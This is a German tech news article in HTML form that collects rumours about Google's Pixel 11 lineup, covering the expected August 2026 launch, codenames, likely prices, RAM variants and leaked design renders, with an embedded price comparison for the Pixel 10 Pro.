<p>Die Google-Pixel-11-Reihe wird voraussichtlich im <strong>August 2026</strong> auf den Markt kommen, wahrscheinlich im Rahmen der jährlichen Sommerveranstaltung von Google. Der offizielle Termin dafür ist der <strong>12. August 2026.</strong></p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4ade1c"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/09/Google-Pixel-9-Pro_review_1.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Google Pixel 9 Pro review 1" class="wp-image-2457624" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Dominik Tomaszewski / Foundry</p></div>



<p><a href="https://www.androidauthority.com/exclusive-pixel-10a-pixel-11-codename-3516163/" target="_blank" rel="noreferrer noopener">Gerüchten</a> zufolge soll die Pixel-11-Serie tatsächlich erneut bis zu vier Geräte umfassen. Sollte Google wie in den letzten Jahren verfahren, wird das Pixel 11 Pro Fold später auf den Markt kommen als die anderen Modelle.</p>



<p>Diese Dokumente bestätigen die Codenamen für die Pixel-Geräte des Jahres 2026, wobei die Pixel-11-Serie Namen mit Bärenbezug trägt, wie „cubs“ für das Standardmodell Pixel 11, „grizzly“ für das Pixel 11 Pro, „kodiak“ für das Pixel 11 Pro XL und „yogi“ für das Pixel 11 Pro Fold.</p>



<p>Früher brachte Google neue Smartphones im Oktober auf den Markt, hat den Termin jedoch bei den letzten beiden Generationen vorverlegt. Zum Vergleich finden Sie hier die Erscheinungsdaten der vorherigen Generationen:</p>



<ul class="wp-block-list">
<li>Google Pixel 10: August 2025</li>



<li>Google Pixel 9: August 2024</li>



<li>Google Pixel 8: Oktober 2023</li>



<li>Google Pixel 7: Oktober 2022</li>



<li>Google Pixel 6: Oktober 2021</li>
</ul>



<p><strong>Aktuell bester Preis: Google Pixel 10 Pro</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  amazon_vendor">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/amazon-logo.svg" alt="Amazon" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>699,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.amazon.de/dp/B0FHL2XPXS?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vars-product-name="Google Pixel 10 Pro" data-vars-product-id="2885443" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885443" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.amazon.de/dp/B0FHL2XPXS?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vendor-api="amazon" data-vars-product-price="699,00 €" data-vars-product-vendor="Amazon" aria-label="Deal anschauen bei Amazon für 699,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/4541.png" alt="notebooksbilliger" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>739,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=9mF14ZML3xvvsU1Wdh-mdc5Hd99OQeF7QCRno7tgpQ2EbEokfk-c7DoPHGkcTOvl4p5eUIvJnUoNvPmu_f-_aq8-Wddkw8eC6f6GK1pGX9tj6A-ynv4JBEq13XGgNNj-5WtidlRBfwe&amp;mid=685576676215&amp;id=685576676215&amp;ts=20260708&amp;log=rss" data-vars-product-name="Google Pixel 10 Pro" data-vars-product-id="2885443" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885443" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=9mF14ZML3xvvsU1Wdh-mdc5Hd99OQeF7QCRno7tgpQ2EbEokfk-c7DoPHGkcTOvl4p5eUIvJnUoNvPmu_f-_aq8-Wddkw8eC6f6GK1pGX9tj6A-ynv4JBEq13XGgNNj-5WtidlRBfwe&amp;mid=685576676215&amp;id=685576676215&amp;ts=20260708&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="739,00 €" data-vars-product-vendor="notebooksbilliger" aria-label="Deal anschauen bei notebooksbilliger für 739,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/15554.png" alt="Proshop.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>749,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=i1S_0nFU02-tiDOfdN0LnJe3tbSWKwr5e1JKjacGdEc6RmIsvl8L8XwpgNs8FzmZYp5eUIvJnUoNvPmu_f-_aqVk-kHwG_HYtp1bPvpt8NnzjRMc48vr-G4U2VorRIJ5LLdD2b4PFgn55AQdrkp4S4&amp;mid=685509711925&amp;id=685509711925&amp;ts=20260708&amp;log=rss" data-vars-product-name="Google Pixel 10 Pro" data-vars-product-id="2885443" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885443" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=i1S_0nFU02-tiDOfdN0LnJe3tbSWKwr5e1JKjacGdEc6RmIsvl8L8XwpgNs8FzmZYp5eUIvJnUoNvPmu_f-_aqVk-kHwG_HYtp1bPvpt8NnzjRMc48vr-G4U2VorRIJ5LLdD2b4PFgn55AQdrkp4S4&amp;mid=685509711925&amp;id=685509711925&amp;ts=20260708&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="749,00 €" data-vars-product-vendor="Proshop.de" aria-label="Deal anschauen bei Proshop.de für 749,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/24204.png" alt="coolblue" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>759,95 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=8QPJI2NQy8XtiDOfdN0LnJe3tbSWKwr5QeYu02RyInb6RmIsvl8L8VovW2rD7AzJop5eUIvJnUoNvPmu_f-_aq8-Wddkw8eC6f6GK1pGX9tj6A-ynv4JBEq13XGgNNj-5WtidlRBfwe&amp;mid=685628452345&amp;id=685628452345&amp;ts=20260708&amp;log=rss" data-vars-product-name="Google Pixel 10 Pro" data-vars-product-id="2885443" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885443" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=8QPJI2NQy8XtiDOfdN0LnJe3tbSWKwr5QeYu02RyInb6RmIsvl8L8VovW2rD7AzJop5eUIvJnUoNvPmu_f-_aq8-Wddkw8eC6f6GK1pGX9tj6A-ynv4JBEq13XGgNNj-5WtidlRBfwe&amp;mid=685628452345&amp;id=685628452345&amp;ts=20260708&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="759,95 €" data-vars-product-vendor="coolblue" aria-label="Deal anschauen bei coolblue für 759,95 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__hidden-records-wrapper">
									<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://s24.media/shop/11af34f513114e17ab24f15ca5083429" alt="Baur Versand" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.085,91 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://lg.s24.cloud/catalog/9116/189565/8832469004" data-vars-product-name="Google Pixel 10 Pro" data-vars-product-id="2885443" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885443" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://lg.s24.cloud/catalog/9116/189565/8832469004" data-vendor-api="shopping24" data-vars-product-price="1.085,91 €" data-vars-product-vendor="Baur Versand" aria-label="Deal anschauen bei Baur Versand für 1.085,91 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.085,91 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=aDi6WCFLcQggFdiMIpCMzOwK0-RvIEuSuStW0SFkIqZMdozeyQB1s3_NYWZJZdx_FUCt42IORS2NdyiYhKsSh4pVXnFPgu6pTKm2AV43KDScDIN4u2A5RPycuBwsu44UCTvm99U9FVv&amp;mid=685497142624&amp;id=685497142624&amp;ts=20260708&amp;log=rss" data-vars-product-name="Google Pixel 10 Pro" data-vars-product-id="2885443" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885443" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=aDi6WCFLcQggFdiMIpCMzOwK0-RvIEuSuStW0SFkIqZMdozeyQB1s3_NYWZJZdx_FUCt42IORS2NdyiYhKsSh4pVXnFPgu6pTKm2AV43KDScDIN4u2A5RPycuBwsu44UCTvm99U9FVv&amp;mid=685497142624&amp;id=685497142624&amp;ts=20260708&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.085,91 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 1.085,91 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<span>Google</span>
													</div>
												<div class="price-comparison__price ">
						<span>1.099,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.jdoqocy.com/click-1676582-14506529?sid=rss&amp;url=https://store.google.com/product/pixel_10_pro" data-vars-product-name="Google Pixel 10 Pro" data-vars-product-id="2885443" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885443" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.jdoqocy.com/click-1676582-14506529?sid=rss&amp;url=https://store.google.com/product/pixel_10_pro" data-vars-product-price="1.099,00 €" data-vars-product-vendor="Google" aria-label="Deal anschauen bei Google für 1.099,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/21515.png" alt="JB-Computer" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.116,08 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=LclCJaTpyFBgvrhhe5GGHeKFFgDnWCVLKnqn0bkX8TYD2eBKnwuxU1ONt2jyH31IlUCt42IORS2NdyiYhKsSh4pVXnFPgu6pTKm2AV43KDScDIN4u2A5RNlddbQJq87NQ&amp;mid=686468941685&amp;id=686468941685&amp;ts=20260708&amp;log=rss" data-vars-product-name="Google Pixel 10 Pro" data-vars-product-id="2885443" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885443" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=LclCJaTpyFBgvrhhe5GGHeKFFgDnWCVLKnqn0bkX8TYD2eBKnwuxU1ONt2jyH31IlUCt42IORS2NdyiYhKsSh4pVXnFPgu6pTKm2AV43KDScDIN4u2A5RNlddbQJq87NQ&amp;mid=686468941685&amp;id=686468941685&amp;ts=20260708&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.116,08 €" data-vars-product-vendor="JB-Computer" aria-label="Deal anschauen bei JB-Computer für 1.116,08 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
									</div>
									<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
											<button class="price-comparison__view-more-button">
							Weitere Angebote						</button>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading toc">Wie viel wird das Google Pixel 11 kosten?</h2>



<p>Die Preise für das Pixel 11 sind noch nicht bestätigt, doch sollte Google seinen jüngsten Preistrends folgen, könnte der Einstiegspreis für das Basismodell bei etwa 899 Euro liegen, während die Pro-Version möglicherweise etwa 1.099 Euro kosten würde. Die Pro XL- und Pro Fold-Versionen könnten etwa 1.299 Euro beziehungsweise 1.899 Euro kosten.</p>



<p>Diese Preisgestaltung würde jedoch bedeuten, dass Google an die Preise der Pixel-10-Modelle anknüpft, bei denen es im Vergleich zur Pixel-9-Serie keine Preiserhöhung gab. Es ist unwahrscheinlich, dass dies zwei Jahre in Folge geschieht; daher rechnen wir eher mit einer Preiserhöhung für die Pixel-11-Smartphones, auch wenn diese nur geringfügig ausfällt.</p>



<p>Ein Hinweis, der möglicherweise auf Googles Strategie hindeutet, Preiserhöhungen zu vermeiden, ist die Reduzierung der RAM-Kapazität bei den neuen Smartphones. Es scheint, als werde Google das 11 Pro und das 11 Pro XL in zwei Varianten mit entweder 12 oder 16 GB RAM anbieten.</p>



<p>Das 12-GB-Modell könnte die Lösung sein, mit der Google einen höheren Einstiegspreis für seine Flaggschiff-Smartphones vermeiden könnte – auch wenn dies bedeutet, dass Sie für denselben Preis nicht so viel Leistung erhalten wie bei den aktuellen Modellen <a href="https://www.pcwelt.de/article/2894857/google-pixel-10-pro-test-2.html" target="_blank" rel="noreferrer noopener">Pixel 10 Pro</a> und <a href="https://www.pcwelt.de/article/2896055/google-pixel-10-pro-xl-test-bestes-android-handy-2025.html" target="_blank" rel="noreferrer noopener">10 Pro XL</a>.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b4b25"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/09/Google-Pixel-9-Pro-Fold-review-34.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Google Pixel 9 Pro Fold review 34" class="wp-image-2454254" width="1200" height="672" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Luke Baker</p></div>



<h2 class="wp-block-heading toc">Welche technischen Daten und Funktionen wird das Google Pixel 11 bieten?</h2>



<div class="wp-block-idg-base-theme-listicle-chart-block wp-block-product-chart product-chart">
<div class="wp-block-listicle-chart"><div class="listicle-chart-separator"></div><div class="wp-block-listicle-chart-item listicle-chart-item">
<h3 class="wp-block-heading">Pixel 11: Design &amp; Verarbeitung</h3>



<p>Angesichts der Tatsache, dass Google bisher sehr zurückhaltend war, das Design seiner Smartphones grundlegend zu überarbeiten – abgesehen davon, dass die Kameraleiste ab dem <a href="https://www.pcwelt.de/article/2434705/google-pixel-9-test.html" target="_blank" rel="noreferrer noopener">Pixel 9</a> zu einem Visier umgestaltet wurde –, erwarten wir hier keine gravierenden Änderungen. Die jüngsten Gerüchte haben dies weitgehend bestätigt, doch es gibt einige kleinere Designanpassungen, die die neuen Pixel-Smartphones nicht nur schlanker wirken lassen, sondern auch ihre allgemeine Benutzerfreundlichkeit verbessern sollen.</p>



<p>Da Google zuvor erklärt hat, dass wir alle zwei bis drei Jahre mit einem Redesign rechnen können, scheint es, als werde die Pixel-12-Serie im Jahr 2027 größere Veränderungen mit sich bringen.</p>



<p>Was das Design des Pixel 11 betrifft<a href="https://www.techadvisor.com/article/3102252/google-pixel-11-design-leak-highlights-two-changes.html">,</a> so scheint es – <a href="https://www.androidheadlines.com/google-pixel-11-pro-fold" target="_blank" rel="noreferrer noopener">wie aus CAD-basierten Renderings hervorgeht</a> – dem Pixel 10 äußerst ähnlich zu sein, mit lediglich zwei Designanpassungen. Dabei handelt es sich um einen schmaleren Rahmen um den Bildschirm sowie eine vollständig aus Glas bestehende Kameraleiste anstelle eines Metallabschnitts um den Blitz herum.</p>



<p>Die Abmessungen sind angeblich identisch, abgesehen davon, dass das Smartphone 0,1 Millimeter dünner ist. Bitte beachten Sie, dass die Farbe nur zur Veranschaulichung dient, da sie lediglich auf der Farbe „Lavender“ des <a href="https://www.pcwelt.de/article/3104634/google-pixel-10a-test.html" target="_blank" rel="noreferrer noopener">Pixel 10a</a> basiert.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b532b"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/Google-Pixel-11-design-leaked-front-and-back.webp?w=1200" alt="Google Pixel 11 design leaked front and back" class="wp-image-3102256" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Onleaks / Android Headlines</p></div>



<p>Als Nächstes folgt das Pixel 11 Pro, bei dem sich ein ähnliches Bild wie beim Standardmodell abzeichnet. Die Renderings scheinen ein nahezu identisches Design mit dem gleichen glänzenden Rahmen wie zuvor zu bestätigen, ergänzt durch die neue, komplett schwarze Kameraleiste.</p>



<p>Besonders auffällig ist, dass der Temperatursensor auf der Rückseite zu fehlen scheint. Dieser befindet sich normalerweise unterhalb des Blitzes innerhalb der Kameraleiste und könnte auf den Wegfall dieser einzigartigen, wenn auch eher nischenorientierten Funktion hindeuten.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b5846"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/Google-Pixel-11-Pro-leak-front-and-back.webp" alt="Google Pixel 11 Pro leak front and back" class="wp-image-3103374" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Onleaks / Android Headlines</p></div>



<p>Und hier ist das Renderbild des Pixel 11 Pro XL, das dasselbe zeigt:</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b5d1f"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/04/Google-Pixel-11-Pro-XL-leaked-design.webp" alt="Google Pixel 11 Pro XL design" class="wp-image-3105903" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Onleaks / Android Headlines</p></div>



<p>Für das Pixel 11 Pro Fold sind online einige Renderings aufgetaucht, die eine sehr ähnliche Bauweise wie beim <a href="https://www.pcwelt.de/article/2945312/google-pixel-10-pro-test-3.html" target="_blank" rel="noreferrer noopener">10 Pro Fold</a> zeigen – so sehr, dass man die beiden Modelle auf den ersten Blick verwechseln könnte. Bei genauerem Hinsehen fällt jedoch auf, dass der Blitz und das Mikrofon in die Kameraausbuchtung integriert wurden, um ein einheitliches Erscheinungsbild zu schaffen.</p>



<p>Zwar ist es unwahrscheinlich, dass diese Maßnahme allein zu einer Verbesserung der Kameraqualität des 11 Pro Fold führt, doch aus gestalterischer Sicht wirkt das Design dadurch deutlich aufgeräumter.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b623e"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/Pixel-11-pro-fold-render.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="" class="wp-image-3083650" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">OnLeaks x Android Headlines</p></div>



<p>Interessanter sind die Renderings, die das 11 Pro Fold im Seitenprofil zeigen; sie deuten offenbar darauf hin, dass das Smartphone im aufgeklappten Zustand nur 4,8 Millimeter dünn und im zusammengeklappten Zustand 10,1 Millimeter dick sein wird.</p>



<p>Zugegebenermaßen liegt das Gerät damit noch einen Schritt hinter der Konkurrenz zurück (das <a href="https://www.pcwelt.de/article/2843601/samsung-galaxy-z-fold-7-test.html" target="_blank" rel="noreferrer noopener">Galaxy Z Fold 7</a> und das <a href="https://www.pcwelt.de/article/2838914/honor-magic-v5-test.html" target="_blank" rel="noreferrer noopener">Honor Magic V5</a> sind im aufgeklappten Zustand nur 4,2 Millimeter beziehungsweise 4,1 Millimeter dünn), doch es stellt eine deutliche Verbesserung gegenüber dem 10 Pro Fold dar, das sich in der Hand etwas klobig anfühlte.</p>



<p>Wenden wir uns nun dem Pixel 11 Pro XL zu: Die ersten Vorstellungen davon, wie dieses Smartphone aussehen könnte, stammen nicht aus einer Reihe von Renderings, sondern vom Hüllenhersteller <a href="https://thinborne.com/products/pixel-11-pro-xl-case" target="_blank" rel="noreferrer noopener">Thinborne</a>, der (versehentlich?) die dazugehörige Handyhülle etwas früher als geplant vorgestellt hat.</p>



